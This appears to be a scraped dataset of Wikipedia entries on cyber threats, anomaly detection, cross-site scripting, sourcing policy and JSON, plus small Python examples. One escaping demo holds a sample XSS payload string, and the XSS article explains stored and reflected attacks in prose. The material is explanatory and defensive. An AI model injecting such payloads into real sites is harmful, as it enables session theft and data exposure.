compromise, attack techniques, and threat actor profiles. By using threat intelligence, organizations can develop a better understanding of the threat landscape and improve their ability to detect and respond to threats. 22 Threat consequence is a security violation that results from a threat action. 1 Includes disclosure, deception, disruption, and usurpation. The following subentries describe four kinds of threat consequences, and also list and describe the kinds of threat actions that cause each consequence. 1 Threat actions that are accidental events are marked by . A collection of threats in a particular domain or context, with information on identified vulnerable assets, threats, risks, threat actors and observed trends. 23 24 Threats should be managed by operating an ISMS, performing all the IT risk management activities foreseen by laws, standards and methodologies. Very large organizations tend to adopt business continuity management plans in order to protect, maintain and recover business-critical processes and systems. Some of these plans are implemented by computer security incident response team (CSIRT). Threat management must identify, evaluate, and categorize threats. There are two primary methods of threat assessment: Many organizations perform only a subset of these methods, adopting countermeasures based on a non-systematic approach, resulting in computer insecurity. Information security awareness is a significant market. There has been a lot of software developed to deal with IT threats, including both open-source software and proprietary software. 
25 Threat management involves a wide variety of threats including physical threats like flood and fire. While ISMS risk assessment process does incorporate threat management for cyber threats such as remote buffer overflows the risk assessment process doesn't include processes such as threat intelligence management or response procedures. Cyber threat management (CTM) is emerging as the best practice for managing cyber threats beyond the basic risk assessment found in ISMS. It enables early identification of threats, data-driven situational awareness, accurate decision-making, and timely threat mitigating actions. 26 CTM includes: Cyber threat hunting is "the process of proactively and iteratively searching through networks to detect and isolate advanced threats that evade existing security solutions. 27 This is in contrast to traditional threat management measures, such as firewalls, intrusion detection systems, and SIEMs, which typically involve an investigation after there has been a warning of a potential threat, or an incident has occurred. Threat hunting can be a manual process, in which a security analyst sifts through various data information using their knowledge and familiarity with the network to create hypotheses about potential threats. To be even more effective and efficient, however, threat hunting can be partially automated, or machine-assisted, as well. In this case, the analyst utilizes software that harnesses machine learning and user and entity behaviour analytics (UEBA) to inform the analyst of potential risks. The analyst then investigates these potential risks, tracking suspicious behaviour in the network. Thus hunting is an iterative process, meaning that it must be continuously carried out in a loop, beginning with a hypothesis. There are three types of hypotheses: The analyst researches their hypothesis by going through vast amounts of data about the network. The results are then stored so that they can be used to improve the automated portion of the detection system and to serve as a foundation for future hypotheses. The SANS Institute has conducted research and surveys on the effectiveness of threat hunting to track and disrupt cyber adversaries as early in their process as possible. According to a survey performed in 2019, "61% of the respondents report at least an 11% measurable improvement in their overall security posture" and 23.6% of the respondents have experienced a 'significant improvement' in reducing the dwell time. 29 To protect yourself from computer threats, it's essential to keep your software up-to-date, use strong and unique passwords, and be cautious when clicking on links or downloading attachments. Additionally, using antivirus software and regularly backing up your data can help mitigate the impact of a threat. |
440 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Anomaly_detection | In data analysis, anomaly detection (also referred to as outlier detection and sometimes as novelty detection) is generally understood to be the identification of rare items, events or observations which deviate significantly from the majority of the data and do not conform to a well defined notion of normal behavior. 1 Such examples may arouse suspicions of being generated by a different mechanism, 2 or appear inconsistent with the remainder of that set of data. 3 Anomaly detection finds application in many domains including cybersecurity, medicine, machine vision, statistics, neuroscience, law enforcement and financial fraud to name only a few. Anomalies were initially searched for clear rejection or omission from the data to aid statistical analysis, for example to compute the mean or standard deviation. They were also removed to better predictions from models such as linear regression, and more recently their removal aids the performance of machine learning algorithms. However, in many applications anomalies themselves are of interest and are the observations most desirous in the entire data set, which need to be identified and separated from noise or irrelevant outliers. Three broad categories of anomaly detection techniques exist. 1 Supervised anomaly detection techniques require a data set that has been labeled as "normal" and "abnormal" and involves training a classifier. However, this approach is rarely used in anomaly detection due to the general unavailability of labelled data and the inherent unbalanced nature of the classes. Semi-supervised anomaly detection techniques assume that some portion of the data is labelled. This may be any combination of the normal or anomalous data, but more often than not, the techniques construct a model representing normal behavior from a given normal training data set, and then test the likelihood of a test instance to be generated by the model. Unsupervised anomaly detection techniques assume the data is unlabelled and are by far the most commonly used due to their wider and relevant application. Many attempts have been made in the statistical and computer science communities to define an anomaly. The most prevalent ones include the following, and can be categorised into three groups: those that are ambiguous, those that are specific to a method with pre-defined thresholds usually chosen empirically, and those that are formally defined: In this big data era, the focus is increasingly on methodologies capable of handling the complexity and scale of data, going beyond traditional approaches to define and detect anomalies in a way that is both effective and efficient for today's data-driven decision-making processes. 4 The concept of intrusion detection, a critical component of anomaly detection, has evolved significantly over time. Initially, it was a manual process where system administrators would monitor for unusual activities, such as a vacationing user's account being accessed or unexpected printer activity. This approach was not scalable and was soon superseded by the analysis of audit logs and system logs for signs of malicious behavior. 5 By the late 1970s and early 1980s, the analysis of these logs was primarily used retrospectively to investigate incidents, as the volume of data made it impractical for real-time monitoring. 
The affordability of digital storage eventually led to audit logs being analyzed online, with specialized programs being developed to sift through the data. These programs, however, were typically run during off-peak hours due to their computational intensity. 5 The 1990s brought the advent of real-time intrusion detection systems capable of analyzing audit data as it was generated, allowing for immediate detection of and response to attacks. This marked a significant shift towards proactive intrusion detection. 5 As the field has continued to develop, the focus has shifted to creating solutions that can be efficiently implemented across large and complex network environments, adapting to the ever-growing variety of security threats and the dynamic nature of modern computing infrastructures. 5 Anomaly detection is applicable in a very large number and variety of domains, and is an important subarea of unsupervised machine learning. As such it has applications in cyber-security, intrusion detection, fraud detection, fault detection, system health monitoring, event detection in sensor networks, detecting ecosystem disturbances, defect detection in images using machine vision, medical diagnosis and law enforcement. 6 Anomaly detection was proposed for intrusion detection systems (IDS) by Dorothy Denning in 1986. 7 Anomaly detection for IDS is normally accomplished with thresholds and statistics, but can also be done with soft computing and inductive learning. 8 Types of features proposed by 1999 included profiles of users, workstations, networks, remote hosts, groups of users, and programs based on frequencies, means, variances, covariances, and standard deviations. 9 The counterpart of anomaly detection in intrusion detection is misuse detection. Anomaly detection is vital in fintech for fraud prevention. 10 11 Preprocessing data to remove anomalies can be an important step in data analysis, and is done for a number of reasons. Statistics such as the mean and standard deviation are more accurate after the removal of anomalies, and the visualisation of data can also be improved. In supervised learning, removing the anomalous data from the dataset often results in a statistically significant increase in accuracy. 12 13 Anomaly detection has become increasingly vital in video surveillance to enhance security and safety. 14 15 With the advent of deep learning technologies, methods using Convolutional Neural Networks (CNNs) and Simple Recurrent Units (SRUs) have shown significant promise in identifying unusual activities or behaviors in video data. 14 These models can process and analyze extensive video feeds in real-time, recognizing patterns that deviate from the norm, which may indicate potential security threats or safety violations. 14 In IT infrastructure management, anomaly detection is crucial for ensuring the smooth operation and reliability of services. 16 Techniques like the IT Infrastructure Library (ITIL) and monitoring frameworks are employed to track and manage system performance and user experience. 16 Detecting anomalies can help identify and pre-empt potential performance degradations or system failures, thus maintaining productivity and business process effectiveness. 16 Anomaly detection is critical for the security and efficiency of Internet of Things (IoT) systems. 17 It helps in identifying system failures and security breaches in complex networks of IoT devices. 17 The methods must manage real-time data, diverse device types, and scale effectively. Garbe et al. 
18 have introduced a multi-stage anomaly detection framework that improves upon traditional methods by incorporating spatial clustering, density-based clustering, and locality-sensitive hashing. This tailored approach is designed to better handle the vast and varied nature of IoT data, thereby enhancing security and operational reliability in smart infrastructure and industrial IoT systems. 18 Anomaly detection is crucial in the petroleum industry for monitoring critical machinery. 19 Mart et al. used a novel segmentation algorithm to analyze sensor data for real-time anomaly detection. 19 This approach helps promptly identify and address any irregularities in sensor readings, ensuring the reliability and safety of petroleum operations. 19 In the oil and gas sector, anomaly detection is not just crucial for maintenance and safety, but also for environmental protection. 20 Aljameel et al. propose an advanced machine learning-based model for detecting minor leaks in oil and gas pipelines, a task traditional methods may miss. 20 Many anomaly detection techniques have been proposed in the literature. 1 21 The performance of methods usually depends on the data sets. For example, some may be suited to detecting local outliers while others are suited to global ones, and methods have few systematic advantages over one another when compared across many data sets. 22 23 Almost all algorithms also require the setting of non-intuitive parameters critical for performance, and usually unknown before application. Some of the popular techniques are mentioned below, broken down into categories. Dynamic networks, such as those representing financial systems, social media interactions, and transportation infrastructure, are subject to constant change, making anomaly detection within them a complex task. Unlike static graphs, dynamic networks reflect evolving relationships and states, requiring adaptive techniques for anomaly detection. Many of the methods discussed above only yield an anomaly score prediction, which often can be explained to users as the point being in a region of low data density (or relatively low density compared to the neighbor's densities). In explainable artificial intelligence, users demand methods with higher explainability. Some methods allow for more detailed explanations. |
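As a concrete, hedged illustration of the unsupervised category described above, the sketch below fits an Isolation Forest to unlabelled synthetic data and flags the points it isolates most easily as anomalies. scikit-learn is an assumed extra dependency (it is not installed earlier in this notebook), and the data and contamination value are illustrative, not taken from the article.
import numpy as np
from sklearn.ensemble import IsolationForest

rng = np.random.default_rng(42)
normal = rng.normal(loc=0.0, scale=1.0, size=(200, 2))   # bulk of the data
outliers = rng.uniform(low=6.0, high=8.0, size=(5, 2))   # injected anomalies
X = np.vstack([normal, outliers])

# contamination (the expected fraction of anomalies) is exactly the kind of
# non-intuitive, data-set-dependent parameter the article mentions
model = IsolationForest(contamination=0.03, random_state=0)
labels = model.fit_predict(X)         # -1 = anomaly, 1 = normal
scores = model.decision_function(X)   # lower score = more anomalous

print("Indices flagged as anomalous:", np.where(labels == -1)[0])

The same pattern covers the semi-supervised case by fitting only on data assumed to be normal and then scoring new instances against that model.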
441 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Special:WhatLinksHere/Web_scraping | The following pages link to Web scraping Showing 50 items. |
442 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Cross-site_scripting | Cross-site scripting (XSS) is a type of security vulnerability that can be found in some web applications. XSS attacks enable attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy. During the second half of 2007, XSSed documented 11,253 site-specific cross-site vulnerabilities, compared to 2,134 "traditional" vulnerabilities documented by Symantec. 1 XSS effects vary in range from petty nuisance to significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner network. OWASP considers the term cross-site scripting to be a misnomer. It initially was an attack that was used for breaching data across sites, but gradually started to include other forms of data injection attacks. 2 Security on the web depends on a variety of mechanisms, including an underlying concept of trust known as the same-origin policy. This states that if content from one site (such as https: mybank.example1.com) is granted permission to access resources (like cookies etc.) on a web browser, then content from any URL with the same (1) URI scheme (e.g. ftp, http, or https), (2) host name, and (3) port number will share these permissions. Content from URLs where any of these three attributes are different will have to be granted permissions separately. 3 Cross-site scripting attacks use known vulnerabilities in web-based applications, their servers, or the plug-in systems on which they rely. Exploiting one of these, attackers fold malicious content into the content being delivered from the compromised site. When the resulting combined content arrives at the client-side web browser, it has all been delivered from the trusted source, and thus operates under the permissions granted to that system. By finding ways of injecting malicious scripts into web pages, an attacker can gain elevated access-privileges to sensitive page content, to session cookies, and to a variety of other information maintained by the browser on behalf of the user. Cross-site scripting attacks are a case of code injection. Microsoft security-engineers introduced the term "cross-site scripting" in January 2000. 4 The expression "cross-site scripting" originally referred to the act of loading the attacked, third-party web application from an unrelated attack-site, in a manner that executes a fragment of JavaScript prepared by the attacker in the security context of the targeted domain (taking advantage of a reflected or non-persistent XSS vulnerability). The definition gradually expanded to encompass other modes of code injection, including persistent and non-JavaScript vectors (including ActiveX, Java, VBScript, Flash, or even HTML scripts), causing some confusion to newcomers to the field of information security. 5 XSS vulnerabilities have been reported and exploited since the 1990s. Prominent sites affected in the past include the social-networking sites Twitter 6 and Facebook. 7 Cross-site scripting flaws have since surpassed buffer overflows to become the most common publicly reported security vulnerability, 8 with some researchers in 2007 estimating as many as 68% of websites are likely open to XSS attacks. 
9 There is no single, standardized classification of cross-site scripting flaws, but most experts distinguish between at least two primary flavors of XSS flaws: non-persistent and persistent. Some sources further divide these two groups into traditional (caused by server-side code flaws) and DOM-based (in client-side code). The non-persistent (or reflected) cross-site scripting vulnerability is by far the most basic type of web vulnerability. 10 These holes show up when the data provided by a web client, 11 most commonly in HTTP query parameters (e.g. HTML form submission), is used immediately by server-side scripts to parse and display a page of results for and to that user, without properly sanitizing the content. 12 Because HTML documents have a flat, serial structure that mixes control statements, formatting, and the actual content, any non-validated user-supplied data included in the resulting page without proper HTML encoding, may lead to markup injection. 10 12 A classic example of a potential vector is a site search engine: if one searches for a string, the search string will typically be redisplayed verbatim on the result page to indicate what was searched for. If this response does not properly escape or reject HTML control characters, a cross-site scripting flaw will ensue. 13 A reflected attack is typically delivered via email or a neutral web site. The bait is an innocent-looking URL, pointing to a trusted site but containing the XSS vector. If the trusted site is vulnerable to the vector, clicking the link can cause the victim's browser to execute the injected script. The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on "normal" pages returned to other users in the course of regular browsing, without proper HTML escaping. A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read. 12 For example, suppose there is a dating website where members scan the profiles of other members to see if they look interesting. For privacy reasons, this site hides everybody's real name and email. These are kept secret on the server. The only time a member's real name and email are in the browser is when the member is signed in, and they can't see anyone else's. Suppose that Mallory, an attacker, joins the site and wants to figure out the real names of the people she sees on the site. To do so, she writes a script designed to run from other users' browsers when they visit her profile. The script then sends a quick message to her own server, which collects this information. To do this, for the question "Describe your Ideal First Date", Mallory gives a short answer (to appear normal), but the text at the end of her answer is her script to steal names and emails. If the script is enclosed inside a script element, it won't be shown on the screen. Then suppose that Bob, a member of the dating site, reaches Mallory's profile, which has her answer to the First Date question. Her script is run automatically by the browser and steals a copy of Bob's real name and email directly from his own machine. Persistent XSS vulnerabilities can be more significant than other types because an attacker's malicious script is rendered automatically, without the need to individually target victims or lure them to a third-party website. 
Particularly in the case of social networking sites, the code would be further designed to self-propagate across accounts, creating a type of client-side worm. 14 The methods of injection can vary a great deal; in some cases, the attacker may not even need to directly interact with the web functionality itself to exploit such a hole. Any data received by the web application (via email, system logs, IM etc.) that can be controlled by an attacker could become an injection vector. XSS vulnerabilities were originally found in applications that performed all data processing on the server side. User input (including an XSS vector) would be sent to the server, and then sent back to the user as a web page. The need for an improved user experience resulted in popularity of applications that had a majority of the presentation logic (maybe written in JavaScript) working on the client-side that pulled data, on-demand, from the server using AJAX. As the JavaScript code was also processing user input and rendering it in the web page content, a new sub-class of reflected XSS attacks started to appear that was called DOM-based cross-site scripting. In a DOM-based XSS attack, the malicious data does not touch the web server. Rather, it is being reflected by the JavaScript code, fully on the client side. 15 An example of a DOM-based XSS vulnerability is the bug found in 2011 in a number of jQuery plugins. 16 Prevention strategies for DOM-based XSS attacks include very similar measures to traditional XSS prevention strategies but implemented in JavaScript code and contained in web pages (i.e. input validation and escaping). 17 Some JavaScript frameworks have built-in countermeasures against this and other types of attack — for example AngularJS. 18 Self-XSS is a form of XSS vulnerability that relies on social engineering in order to trick the victim into executing malicious JavaScript code in their browser. Although it is technically not a true XSS vulnerability due to the fact it relies on socially engineering a user into executing code rather than a flaw in the affected website allowing an attacker to do so, it still poses the same risks as a regular XSS vulnerability if properly executed. 19 Mutated XSS happens when the attacker injects something that is seemingly safe but is rewritten and modified by the browser while parsing the markup. This makes it extremely hard to detect or sanitize within the website's application logic. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters on parameters to CSS font-family. There are several escaping schemes that can be used depending on where the untrusted string needs to be placed within an HTML document including HTML entity encoding, JavaScript escaping, CSS escaping, and URL (or percent) encoding. 20 Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS attacks in a fairly straightforward manner. Performing HTML entity encoding only on the five XML significant characters is not always sufficient to prevent many forms of XSS attacks, security encoding libraries are usually easier to use. 20 Some web template systems understand the structure of the HTML they produce and automatically pick an appropriate encoder. 21 22 23 Many operators of particular web applications (e.g. forums and webmail) allow users to utilize a limited subset of HTML markup. 
When accepting HTML input from users (say, <b>very</b> large), output encoding (such as &lt;b&gt;very&lt;/b&gt; large) will not suffice since the user input needs to be rendered as HTML by the browser (so it shows as "very large", instead of "<b>very</b> large"). Stopping an XSS attack when accepting HTML input from users is much more complex in this situation. Untrusted HTML input must be run through an HTML sanitization engine to ensure that it does not contain XSS code. Many validations rely on parsing out (blacklisting) specific "at risk" HTML tags such as the iframe tag, link and the script tag. There are several issues with this approach; for example, sometimes seemingly harmless tags can be left out which, when utilized correctly, can still result in an XSS vulnerability. Another popular method is to strip user input of markup such as script tags; however, this can also be bypassed, as the payload can be concealed with obfuscation. Besides content filtering, other imperfect methods for cross-site scripting mitigation are also commonly used. One example is the use of additional security controls when handling cookie-based user authentication. Many web applications rely on session cookies for authentication between individual HTTP requests, and because client-side scripts generally have access to these cookies, simple XSS exploits can steal these cookies. 24 To mitigate this particular threat (though not the XSS problem in general), many web applications tie session cookies to the IP address of the user who originally logged in, then only permit that IP to use that cookie. 25 This is effective in most situations (if an attacker is only after the cookie), but obviously breaks down in situations where an attacker is behind the same NATed IP address or web proxy as the victim, or the victim is changing his or her mobile IP. 25 Another mitigation present in Internet Explorer (since version 6), Firefox (since version 2.0.0.5), Safari (since version 4), Opera (since version 9.5) and Google Chrome, is an HttpOnly flag which allows a web server to set a cookie that is unavailable to client-side scripts. While beneficial, the feature can neither fully prevent cookie theft nor prevent attacks within the browser. 26 While Web 2.0 and Ajax developers require the use of JavaScript, 27 some web applications are written to allow operation without the need for any client-side scripts. 28 This allows users, if they choose, to disable scripting in their browsers before using the application. In this way, even potentially malicious client-side scripts could be inserted unescaped on a page, and users would not be susceptible to XSS attacks. Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis. This approach is of limited value if scripting is allowed by default, since it blocks bad sites only after the user knows that they are bad, which is too late. Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effective. This has been possible for a long time in Internet Explorer (since version 4) by setting up its so-called "Security Zones", 29 and in Opera (since version 9) using its "Site Specific Preferences". 30 A solution for Firefox and other Gecko-based browsers is the open-source NoScript add-on which, in addition to the ability to enable scripts on a per-domain basis, provides some XSS protection even when scripts are enabled. 
31 The most significant problem with blocking all scripts on all websites by default is substantial reduction in functionality and responsiveness (client-side scripting can be much faster than server-side scripting because it does not need to connect to a remote server and the page or frame does not need to be reloaded). 32 Another problem with script blocking is that many users do not understand it, and do not know how to properly secure their browsers. Yet another drawback is that many sites do not work without client-side scripting, forcing users to disable protection for that site and opening their systems to vulnerabilities. 33 The Firefox NoScript extension enables users to allow scripts selectively from a given page while disallowing others on the same page. For example, scripts from example.com could be allowed, while scripts from advertisingagency.com that are attempting to run on the same page could be disallowed. 34 Content Security Policy (CSP) allows HTML documents to opt in to disabling some scripts while leaving others enabled. 35 The browser checks each script against a policy before deciding whether to run it. As long as the policy only allows trustworthy scripts and disallows dynamic code loading, the browser will not run programs from untrusted authors regardless of the HTML document's structure. Modern CSP policies allow using nonces to mark scripts in the HTML document as safe to run instead of keeping the policy entirely separate from the page content. 36 37 As long as trusted nonces only appear on trustworthy scripts, the browser will not run programs from untrusted authors. Some large application providers report having successfully deployed nonce-based policies. 38 39 Trusted types 40 changes Web APIs to check that values have been trademarked as trusted. As long as programs only trademark trustworthy values, an attacker who controls a JavaScript string value cannot cause XSS. Trusted types are designed to be auditable by blue teams. Another defense approach is to use automated tools that will remove XSS malicious code in web pages, these tools use static analysis and or pattern matching methods to identify malicious codes potentially and secure them using methods like escaping. 41 When a cookie is set with the SameSite Strict parameter, it is stripped from all cross-origin requests. When set with SameSite Lax, it is stripped from all non "safe" cross-origin requests (that is, requests other than GET, OPTIONS, and TRACE which have read-only semantics). 42 The feature is implemented in Google Chrome since version 63 and Firefox since version 60. 43 |
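The output-encoding defense discussed above can be shown with a minimal, hedged Python sketch: escaping untrusted input before it is reflected into a results page, as in the search-engine example of a reflected XSS. The render_search_results function and its tiny template are hypothetical, and a real application would still need context-aware encoding (and ideally a Content Security Policy) rather than this single step.
import html

def render_search_results(query):
    # html.escape turns <, >, & and (with quote=True) quote characters into
    # HTML entities, so injected markup is displayed rather than executed
    safe_query = html.escape(query, quote=True)
    return "<p>You searched for: " + safe_query + "</p>"

# An attempted reflected-XSS payload is rendered inert:
print(render_search_results('<script>alert("xss")</script>'))
# <p>You searched for: &lt;script&gt;alert(&quot;xss&quot;)&lt;/script&gt;</p>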
443 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Wikipedia:Verifiability | In the English Wikipedia, verifiability means people using the encyclopedia can check that the information comes from a reliable source. Its content is determined by previously published information rather than editors' beliefs, opinions, experiences, or previously unpublished ideas or information. Even if you are sure something is true, it must have been previously published in a reliable source before you can add it. a If reliable sources disagree with each other, then maintain a neutral point of view and present what the various sources say, giving each side its due weight. All material in Wikipedia mainspace, including everything in articles, lists, and captions, must be verifiable. Additionally, four types of information must be accompanied by an inline citation to a reliable source that directly supports b the material. The four types are: Any material that needs an inline citation but does not have one may be removed. Please immediately remove contentious material about living people (or existing groups) that is unsourced or poorly sourced. For how to write citations, see citing sources. Verifiability, no original research, and neutral point of view are Wikipedia's core content policies. They work together to determine content, so editors should understand the key points of all three. Articles must also comply with the copyright policy. All content must be verifiable. The burden to demonstrate verifiability lies with the editor who adds or restores material, and it is satisfied by providing an inline citation to a reliable source that directly supports b the contribution. c Using inline citations, provide reliable, published sources for all: The cited source must clearly support the material as presented in the article. Cite the source clearly, ideally giving page number(s)—though sometimes a section, chapter, or other division may be appropriate instead; see Wikipedia:Citing sources for details of how to do this. Any material lacking an inline citation to a reliable source that directly supports b the material may be removed and should not be restored without an inline citation to a reliable source. Whether and how quickly material should be initially removed for not having an inline citation to a reliable source depends on the material and the overall state of the article. In some cases, editors may object if you remove material without giving them time to provide references. Consider adding a citation needed tag as an interim step. d When tagging or removing material for lacking an inline citation, please state your concern that it may not be possible to find a published reliable source, and the material therefore may not be verifiable. e If you think the material is verifiable, you are encouraged to provide an inline citation yourself before considering whether to remove or tag it. Do not leave unsourced or poorly sourced material in an article if it might damage the reputation of living people 1 or existing groups, and do not move it to the talk page. You should also be aware of how Wikipedia:Biographies of living persons also applies to groups. A cited source on Wikipedia is often a specific portion of text (such as a short article or a page in a book). But when editors discuss sources (for example, to debate their appropriateness or reliability) the word source has four related meanings: All four can affect reliability. 
Base articles on reliable, independent, published sources with a reputation for fact-checking and accuracy. Source material must have been published, the definition of which for the purposes of Wikipedia is made available to the public in some form. f Unpublished materials are not considered reliable. Use sources that directly support the material presented in an article and are appropriate to the claims made. The appropriateness of any source depends on the context. Be especially careful when sourcing content related to living people or medicine. If available, academic and peer-reviewed publications are usually the most reliable sources on topics such as history, medicine, and science. Editors may also use material from reliable non-academic sources, particularly if it appears in respected mainstream publications. Other reliable sources include: Editors may also use electronic media, subject to the same criteria (see details in Wikipedia:Identifying reliable sources and Wikipedia:Search engine test). The best sources have a professional structure for checking or analyzing facts, legal issues, evidence, and arguments. The greater the degree of scrutiny given to these issues, the more reliable the source. Some newspapers, magazines, and other news organizations host online pages, columns or rolling text they call blogs. These may be acceptable sources if the writers are professionals, but use them with caution because blogs may not be subject to the news organization's normal fact-checking process. g If a news organization publishes an opinion piece in a blog, attribute the statement to the writer, e.g. "Jane Smith wrote ... Never use the blog comments that are left by the readers as sources. For personal or group blogs that are not reliable sources, see Self-published sources below. To discuss the reliability of a specific source for a particular statement, consult Wikipedia:Reliable sources Noticeboard, which seeks to apply this policy to particular cases. For a guideline discussing the reliability of particular types of sources, see Wikipedia:Reliable sources. In the case of inconsistency between this policy and the Wikipedia:Reliable sources guideline, or any other guideline related to sourcing, this policy has priority. Questionable sources are those that have a poor reputation for checking the facts, lack meaningful editorial oversight, or have an apparent conflict of interest. Such sources include websites and publications expressing views widely considered by other sources to be promotional, extremist, or relying heavily on unsubstantiated gossip, rumor, or personal opinion. Questionable sources should be used only as sources for material on themselves, such as in articles about themselves; see below. They are not suitable sources for contentious claims about others. Predatory open access journals are considered questionable due to the absence of quality control in the peer-review process. Anyone can create a personal web page, self-publish a book, or claim to be an expert. That is why self-published material such as books, patents, newsletters, personal websites, open wikis, personal or group blogs (as distinguished from newsblogs, above), content farms, Internet forum postings, and social media postings are largely not acceptable as sources. Self-published expert sources may be considered reliable when produced by an established subject-matter expert, whose work in the relevant field has previously been published by reliable, independent publications. 
g Exercise caution when using such sources: if the information in question is suitable for inclusion, someone else will probably have published it in independent, reliable sources. 2 Never use self-published sources as third-party sources about living people, even if the author is an expert, well-known professional researcher, or writer. Self-published and questionable sources may be used as sources of information about themselves, usually in articles about themselves or their activities, without the self-published source requirement that they are established experts in the field, so long as: This policy also applies to material made public by the source on social networking websites such as Twitter, Tumblr, LinkedIn, Reddit, and Facebook. Do not use articles from Wikipedia (whether English Wikipedia or Wikipedias in other languages) as sources, since Wikipedia is a user-generated source. Also, do not use websites mirroring Wikipedia content or publications relying on material from Wikipedia as sources. Content from a Wikipedia article is not considered reliable unless it is backed up by citing reliable sources. Confirm that these sources support the content, then use them directly. 3 An exception is allowed when Wikipedia itself is being discussed in the article. These may cite an article, guideline, discussion, statistic, or other content from Wikipedia (or a sister project) to support a statement about Wikipedia. Wikipedia or the sister project is a primary source in this case and may be used following the policy for primary sources. Any such use should avoid original research, undue emphasis on Wikipedia's role or views, and inappropriate self-reference. The article text should clarify how the material is sourced from Wikipedia to inform the reader about the potential bias. Do not reject reliable sources just because they are difficult or costly to access. Some reliable sources are not easily accessible. For example, an online source may require payment, and a print-only source may be available only through libraries. Rare historical sources may even be available only in special museum collections and archives. If you have trouble accessing a source, others may be able to do so on your behalf (see WikiProject Resource Exchange). Citations to non-English reliable sources are allowed on the English Wikipedia. However, because this project is in English, English-language sources are preferred over non-English ones when they are available and of equal quality and relevance. As with sources in English, if a dispute arises involving a citation to a non-English source, editors may request a quotation of relevant portions of the original source be provided, either in text, in a footnote, or on the article talk page. h (See Template:Request quotation.) If you quote a non-English reliable source (whether in the main text or in a footnote), a translation into English should accompany the quote. Translations published by reliable sources are preferred over translations by Wikipedians, but translations by Wikipedians are preferred over machine translations. When using a machine translation of source material, editors should be reasonably certain that the translation is accurate and the source is appropriate. Editors should not rely upon machine translations of non-English sources in contentious articles or biographies of living people. If needed, ask an editor who can translate it for you. 
The original text is usually included with the translated text in articles when translated by Wikipedians, and the translating editor is usually not cited. When quoting any material, whether in English or in some other language, be careful not to violate copyright; see the fair-use guideline. While information must be verifiable for inclusion in an article, not all verifiable information must be included. Consensus may determine that certain information does not improve an article. Such information should be omitted or presented instead in a different article. The responsibility for achieving consensus for inclusion is on those seeking to include disputed content. If you want to request an inline citation for an unsourced statement, you can tag a sentence with the citation needed template by writing cn or fact . Other templates exist for tagging sections or entire articles here. You can also leave a note on the talk page asking for a source, or move the material to the talk page and ask for a source there. To request verification that a reference supports the text, tag it with verification needed . Material that fails verification may be tagged with failed verification or removed. It helps other editors to explain your rationale for using templates to tag material in the template, edit summary, or on the talk page. Take special care with contentious material about living and recently deceased people. Unsourced or poorly sourced material that is contentious, especially text that is negative, derogatory, or potentially damaging, should be removed immediately rather than tagged or moved to the talk page. Any exceptional claim requires multiple high-quality sources. 4 Warnings (red flags) that should prompt extra caution include: Do not plagiarize or breach copyright when using sources. Summarize source material in your own words as much as possible; when quoting or closely paraphrasing a source, use an inline citation, and in-text attribution where appropriate. Do not link to any source that violates the copyrights of others per contributors' rights and obligations. You can link to websites that display copyrighted works as long as the website has licensed the work or uses the work in a way compliant with fair use. Knowingly directing others to material that violates copyright may be considered contributory copyright infringement. If there is reason to think a source violates copyright, do not cite it. This is particularly relevant when linking to sites such as Scribd or YouTube, where due care should be taken to avoid linking to material violating copyright. Even when information is cited to reliable sources, you must present it with a neutral point of view (NPOV). Articles should be based on thorough research of sources. All articles must adhere to NPOV, fairly representing all majority and significant-minority viewpoints published by reliable sources, in rough proportion to the prominence of each view. Tiny-minority views need not be included, except in articles devoted to them. If there is a disagreement between sources, use in-text attribution: "John Smith argues X, while Paul Jones maintains Y, followed by an inline citation. Sources themselves do not need to maintain a neutral point of view. Indeed, many reliable sources are not neutral. Our job as editors is simply to summarize what reliable sources say. If no reliable, independent sources can be found on a topic, Wikipedia should not have an article on it (i.e., the topic is not notable). 
However, notability is based on the existence of suitable sources, not on the state of sourcing in an article (WP:NEXIST). The no original research policy (NOR) is closely related to the Verifiability policy. Among its requirements are: |
444 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit&section=15 | No article content: the scraped page is a MediaWiki edit-permission notice stating that the IP range 180.190.0.0/16 is blocked from editing (local block expiring 22 May 2032, global block expiring 21 December 2024), with instructions for logged-in editing and block appeals. |
445 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/JSON | JSON (JavaScript Object Notation, pronounced /ˈdʒeɪsən/ or /ˈdʒeɪˌsɒn/) is an open standard file format and data interchange format that uses human-readable text to store and transmit data objects consisting of attribute-value pairs and arrays (or other serializable values). It is a commonly used data format with diverse uses in electronic data interchange, including that of web applications with servers. JSON is a language-independent data format. It was derived from JavaScript, but many modern programming languages include code to generate and parse JSON-format data. JSON filenames use the extension .json. Douglas Crockford originally specified the JSON format in the early 2000s. 1 He and Chip Morningstar sent the first JSON message in April 2001. The 2017 international standard (ECMA 404 and ISO IEC 21778:2017) specifies that "JSON" is "pronounced /ˈdʒeɪ.sən/, as in 'Jason and The Argonauts'". 2 3 The first (2013) edition of ECMA 404 did not address the pronunciation. 4 The UNIX and Linux System Administration Handbook states, "Douglas Crockford, who named and promoted the JSON format, says it's pronounced like the name Jason. But somehow, 'JAY-sawn' seems to have become more common in the technical community." 5 Crockford said in 2011, "There's a lot of argument about how you pronounce that, but I strictly don't care." 1 After RFC 4627 had been available as its "informational" specification since 2006, JSON was first standardized in 2013, as ECMA 404. 4 RFC 8259, published in 2017, is the current version of the Internet Standard STD 90, and it remains consistent with ECMA 404. 6 That same year, JSON was also standardized as ISO IEC 21778:2017. 2 The ECMA and ISO IEC standards describe only the allowed syntax, whereas the RFC covers some security and interoperability considerations. 7 JSON grew out of a need for a real-time server-to-browser session communication protocol without using browser plugins such as Flash or Java applets, the dominant methods used in 